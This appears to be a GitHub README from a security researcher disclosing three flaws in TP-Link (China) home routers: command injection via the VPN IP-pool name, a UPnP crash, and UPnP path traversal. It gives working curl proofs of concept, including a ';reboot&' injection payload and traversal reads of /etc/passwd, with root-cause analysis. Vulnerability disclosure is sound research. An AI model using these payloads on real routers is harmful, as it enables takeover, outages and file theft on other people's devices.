Skip to content

About

TP-Link (China) router firmware vulnerabilities

Resources

Stars

3 stars

Watchers

0 watching

Forks

Latest commit

 

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 

Repository files navigation

My TP-Link (China) router vulnerabilities

This repository contains 3 vulnerabilities I found in 7DR/WDR/XDR home series TP-Link (China) routers. All of them are tested on 7DR3630 v4.0, firmware version 1.0.16.

這個GitHub repo沒有中文版,因為我懶得翻譯了😐要看中文版,請到我的Blog:简中 繁中。

CVE IDs are still pending. I will update this README once they are assigned.

Check out my main blog post! Link: http://alaggydev.github.io/posts/hacking-tp-link-router-en/

Vulnerabilities:

  • Command injection in web interface via VPN ippool management
  • Denial of service (DoS) attack via malformed HTTP requests in UPNP
  • Arbitrary file read via path traversal in UPNP

Command injection in web interface via VPN ippool management

Under VPN -> 服务端用户管理 -> 新增地址池, the web interface allows users to add and delete IP pools. However, the "name" parameter of the IP pool is vulnerable to command injection. By sending specially crafted HTTP POST requests to the router's web interface, we can execute arbitrary commands or spawn remote shell on the device with root privileges.

Command injection 1

This exploit should work on Chinese TP-Link home routers that have the VPN feature, which is only available in some models. The reverse shell additionally requires game accelerator feature.

POC

  1. Replace <stok> with the actual session token from 192.168.1.1.
  2. Run: curl -X POST -d '{"ippool":{"table":"ippool","para":{"name":";reboot&","start_ip":"2.2.2.2","end_ip":"2.2.2.2","ref":"0"},"name":"ippool_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds
  3. The router will reboot immediately.

Getting a reverse shell

See [Reverse shell][../reverse_shell/README.md] for more details.

Denial of service (DoS) attack via malformed HTTP requests in UPNP

This is a funny vulnerability, in part because I accidentally found it while experimenting with the third vulnerability, and in part because of how easily it can be triggered.

Upon receiving a specially crafted HTTP GET request on port 1900 (UPNP), the router will crash immediately. The potential for exploitation is huge - for example an attacker can easily crash other people's routers by tricking them to visit this bad URL.

POC

  1. Visit http://192.168.1.1:1900/stok=abc (GET request).
  2. The router will crash immediately.

Analysis

The vulnerable code exists in the HTTP request handling logic for port 1900 (UPNP).

The causes of this vulnerability is split into two parts.

  1. In a normal HTTP request, the URL looks like this: http://192.168.1.1/stok=some_token/ds. When the HTTP request parsing code parses the stok parameter, it expects the URL to follow by a / character. Since the / character is missing in the attack URL, the path string will be empty.

DoS 1

  1. In the httpMGetHandle function, the code asserts that the path string is not empty. The assertion failure causes the router to crash.

DoS 2

Arbitrary file read via path traversal in UPNP

The router's HTTP handling logic for port 1900 (UPNP) is also vulnerable to an path traversal vulnerability. By sending specially crafted HTTP requests to the router's UPNP service at port 1900, we can read arbitrary files on the device.

Unauthenticated users can read any files with these extensions: .xml .gif .png .jpeg .ico .jpg .css .js .zip .eot .svg .ttf .woff. Authenticated users can read all files on the device.

POC

Unauthenticated file read:

  1. Run: curl -v --path-as-is "http://192.168.1.1:1900/../../conf/model.xml".
  2. You should see the content of /conf/model.xml file.

Authenticated file read:

  1. Replace <stok> with the actual session token from 192.168.1.1.
  2. Run: curl -v --path-as-is "http://192.168.1.1:1900/stok=<stok>/../../conf/etc/passwd".
  3. You should see the content of /etc/passwd file.

Note: most browsers and HTTP clients will "normalize" the path and remove the ../ characters, so you would need to use curl and the --path-as-is option.

Analysis

The root cause lies in the same "httpMGetHandle" function in vulnerability 2. The code appends "/web/upnp" to the path string, and then uses the path string to read files without sanitization.

File read 1

Note: Getting the stok token

Open the router's web interface on http://192.168.1.1 and login with your credentials. Then, open developer tools by pressing F12 and go to the Network tab. Click on any request and look for the stok parameter in the URL. A stok token should look like this: Q7kLpZrX2aFh9BwM3nTgYcJdV8uHsE4p.

About

TP-Link (China) router firmware vulnerabilities

Resources

Stars

3 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages